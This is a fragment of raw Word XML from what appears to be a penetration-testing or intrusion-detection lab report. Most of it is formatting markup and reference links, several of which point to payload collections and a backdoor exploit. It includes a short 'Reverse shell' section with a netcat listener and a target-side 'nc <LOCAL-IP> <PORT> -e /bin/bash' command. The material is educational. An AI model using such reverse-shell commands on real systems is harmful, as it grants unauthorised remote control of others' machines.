    </w:p>
    <w:p w14:paraId="09B29B3D" w14:textId="1A50EABD" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA"/>
    <w:p w14:paraId="2D4A0E6E" w14:textId="7CDE0D50" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2155">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799ED10B" w14:textId="71F52959" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:r>
        <w:t>On the attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AAD608" w14:textId="2FA7FCE5" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EE8D8" w14:textId="68A9A883" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:r>
        <w:t>On the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB1B344" w14:textId="02076D35" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;LOCAL-IP&gt; &lt;PORT&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56983E5E" w14:textId="77777777" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA"/>
    <w:p w14:paraId="69D003DC" w14:textId="77777777" w:rsidR="006264C9" w:rsidRPr="004E2155" w:rsidRDefault="006264C9" w:rsidP="006264C9"/>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6" w:name="_Toc115782567"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>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49"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50"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51"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lastRenderedPageBreak/>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52"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53"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11E9" w14:textId="77777777" w:rsidR="00BF1B22" w:rsidRDefault="00BF1B22" w:rsidP="00634C6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2D95C412" w14:textId="77777777" w:rsidR="00BF1B22" w:rsidRDefault="00BF1B22"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6FF" w:usb1="4000FCFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Ubuntu">
    <w:altName w:val="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DE7A" w14:textId="77777777" w:rsidR="00BF1B22" w:rsidRDefault="00BF1B22" w:rsidP="00634C6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7AACD134" w14:textId="77777777" w:rsidR="00BF1B22" w:rsidRDefault="00BF1B22"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8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1564438774">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="645158986">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1112478449">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1367681353">
    <w:abstractNumId w:val="19"/>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0"/>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41090"/>
    <w:rsid w:val="001428C5"/>
    <w:rsid w:val="0015482D"/>
    <w:rsid w:val="001549F8"/>
    <w:rsid w:val="00155E9B"/>
    <w:rsid w:val="00163894"/>
    <w:rsid w:val="0016464D"/>
    <w:rsid w:val="00164FA7"/>
    <w:rsid w:val="0016765E"/>
    <w:rsid w:val="00182C69"/>
    <w:rsid w:val="00187809"/>
    <w:rsid w:val="001946D3"/>
    <w:rsid w:val="001C2206"/>
    <w:rsid w:val="001E1C59"/>
    <w:rsid w:val="001E5E2D"/>
    <w:rsid w:val="001F27F9"/>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A6D48"/>
    <w:rsid w:val="003A7FDF"/>
    <w:rsid w:val="003B0146"/>
    <w:rsid w:val="003B5C0B"/>
    <w:rsid w:val="003D14D0"/>
    <w:rsid w:val="003F6E5B"/>
    <w:rsid w:val="0041017F"/>
    <w:rsid w:val="00412D22"/>
    <w:rsid w:val="00421E7B"/>
    <w:rsid w:val="00442F0F"/>
    <w:rsid w:val="00452104"/>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2155"/>
    <w:rsid w:val="004E4F8D"/>
    <w:rsid w:val="004E7C9A"/>
    <w:rsid w:val="004F4AF6"/>
    <w:rsid w:val="005023A7"/>
    <w:rsid w:val="005124E2"/>
    <w:rsid w:val="00516681"/>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2E8B"/>
    <w:rsid w:val="0063452A"/>
    <w:rsid w:val="00634C6F"/>
    <w:rsid w:val="00635638"/>
    <w:rsid w:val="00661063"/>
    <w:rsid w:val="0066727E"/>
    <w:rsid w:val="00667FE8"/>
    <w:rsid w:val="006765E0"/>
    <w:rsid w:val="00683E25"/>
    <w:rsid w:val="0068665A"/>
    <w:rsid w:val="006921D2"/>
    <w:rsid w:val="00693CC2"/>
    <w:rsid w:val="006B21C7"/>
    <w:rsid w:val="006B4B28"/>
    <w:rsid w:val="006B598E"/>
    <w:rsid w:val="006B6DB3"/>
    <w:rsid w:val="006C3E5D"/>
    <w:rsid w:val="006D2153"/>
    <w:rsid w:val="006D41D6"/>
    <w:rsid w:val="006D7616"/>
    <w:rsid w:val="006E0449"/>
    <w:rsid w:val="006F531D"/>
    <w:rsid w:val="00702A15"/>
    <w:rsid w:val="00711563"/>
    <w:rsid w:val="0071361A"/>
    <w:rsid w:val="007220F1"/>
    <w:rsid w:val="00726408"/>
    <w:rsid w:val="007340EA"/>
    <w:rsid w:val="007512F8"/>
    <w:rsid w:val="007531C6"/>
    <w:rsid w:val="00772DFA"/>
    <w:rsid w:val="00773220"/>
    <w:rsid w:val="00782BA9"/>
    <w:rsid w:val="00785C7B"/>
    <w:rsid w:val="00786AE6"/>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01855"/>
    <w:rsid w:val="009107C8"/>
    <w:rsid w:val="009208B5"/>
    <w:rsid w:val="00922CAF"/>
    <w:rsid w:val="00926F5F"/>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55FC"/>
    <w:rsid w:val="00A006DC"/>
    <w:rsid w:val="00A0109C"/>
    <w:rsid w:val="00A04E1F"/>
    <w:rsid w:val="00A07CC5"/>
    <w:rsid w:val="00A07D28"/>
    <w:rsid w:val="00A15DF8"/>
    <w:rsid w:val="00A40D93"/>
    <w:rsid w:val="00A41477"/>
    <w:rsid w:val="00A43ABC"/>
    <w:rsid w:val="00A447F1"/>
    <w:rsid w:val="00A47AD3"/>
    <w:rsid w:val="00A53A03"/>
    <w:rsid w:val="00A6748B"/>
    <w:rsid w:val="00A73FE2"/>
    <w:rsid w:val="00AB1127"/>
    <w:rsid w:val="00AB52F3"/>
    <w:rsid w:val="00AB5F19"/>
    <w:rsid w:val="00AC2210"/>
    <w:rsid w:val="00AE2795"/>
    <w:rsid w:val="00AE58E2"/>
    <w:rsid w:val="00B05ED2"/>
    <w:rsid w:val="00B0687C"/>
    <w:rsid w:val="00B16C30"/>
    <w:rsid w:val="00B2488F"/>
    <w:rsid w:val="00B343F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1B22"/>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56C1"/>
    <w:rsid w:val="00E459AB"/>
    <w:rsid w:val="00E51021"/>
    <w:rsid w:val="00E53987"/>
    <w:rsid w:val="00E53E5C"/>
    <w:rsid w:val="00E648CF"/>
    <w:rsid w:val="00E67820"/>
    <w:rsid w:val="00E86C6E"/>
    <w:rsid w:val="00EA1CC4"/>
    <w:rsid w:val="00EA41A4"/>
    <w:rsid w:val="00EB31A3"/>
    <w:rsid w:val="00EB777E"/>
    <w:rsid w:val="00EC00CE"/>
    <w:rsid w:val="00ED1CCE"/>
    <w:rsid w:val="00ED24CC"/>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8386D"/>
    <w:rsid w:val="00F935E5"/>
    <w:rsid w:val="00FA2180"/>
    <w:rsid w:val="00FB033B"/>
    <w:rsid w:val="00FB4BB5"/>
    <w:rsid w:val="00FC2C2D"/>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twitter.com/leclercqs" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpeg"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.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51.jpeg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doi.org/10.1145/1290958.1290968" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/Intruder/command_exec.txt" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kifarunix.com/install-ossec-hids-agent-on-ubuntu-20-04/" TargetMode="External"/><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hyperlink" Target="https://archive.org/web/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpe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6.jpeg"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.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hyperlink" Target="https://securityboulevard.com/2020/03/intrusion-detection-systems-a-deep-dive-into-nids-hids/"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hyperlink" Target="https://dnsdumpster.com/" TargetMode="External"/><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37.jpe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2.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92.168.10.2/ossec-wui"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9.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.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2.jpeg"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://heimdalsecurity.com/blog/host-intrusion-detection-system-hids/" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"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hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" TargetMode="External"/><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hyperlink" Target="https://www.ettercap-project.org/" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpeg"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpe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3.jpeg"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.jpeg"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/resources/cyberglossary/computer-virus" TargetMode="Externa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98.jpeg"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://LHOST/viruses" TargetMode="External"/><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4.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bettercap.org/" TargetMode="External"/><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image" Target="media/image44.jpeg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.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linkedin.com/in/andy-jassy-8b1615?lipi=urn%3Ali%3Apage%3Ad_flagship3_profile_view_base_contact_details%3BcLibGTmNQKCFhqJYd194eA%3D%3D" TargetMode="External"/><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6.jpeg"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"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image" Target="media/image40.jpeg"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.jpeg"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.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jpeg"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.jpeg"/><Relationship Id="rId148"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7.jpeg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xm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unifiedkillchain.com/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpeg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.jpeg"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpeg"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.jpeg"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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96</Pages>
  <Words>10161</Words>
  <Characters>5792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45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-06T14:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-04T12:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>